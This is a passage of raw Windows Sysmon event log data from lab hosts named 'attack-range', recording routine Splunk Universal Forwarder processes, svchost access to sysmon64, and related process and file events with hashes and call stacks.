Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000219979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:47.254{4F8D34B0-15BF-6216-D904-000000003902}2700C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:48.488{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA02F5272580CCAD0F8CAC499CCC6F62,SHA256=D149067AAF4E00112E57797EC9C48B997CA3FA173E0CEE2E5EDA6931F95A964D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295876Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:47.997{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5B7BFC69716B215B9767A8E12AA098F,SHA256=7B3EAB82519A794E7F218F3602455DEC536C57620C1EFAB1DF19B043BBAFD588,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:48.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B71769DA38B3A47614865C247A9D90EA,SHA256=F28CCA93FE8C80CB0708CC4E9C55EF7E07015F61D0427B0DFE6A1E2651C02B11,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220037Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15C1-6216-DC04-000000003902}1944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220036Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220035Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220034Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220033Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220032Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220031Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220030Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220029Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-15C1-6216-DC04-000000003902}1944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.769{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-15C1-6216-DC04-000000003902}1944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.770{4F8D34B0-15C1-6216-DC04-000000003902}1944C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.534{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4AA89B1ED827BAC86D3402E8F644BC4,SHA256=2FC55F86CA2E3506AB42E74723E28F864F115583D84D938C484B2F4132092D38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295877Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:49.012{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23A6FE3E7401E8B65B2DAD87B3F5A89B,SHA256=8AE83785FFBDC25F32A348AD6CAEB053B499AD3261E16BC8A9EB1BDF7751F55D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.488{4F8D34B0-15C1-6216-DB04-000000003902}32123236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-15C1-6216-DB04-000000003902}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:49.253{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 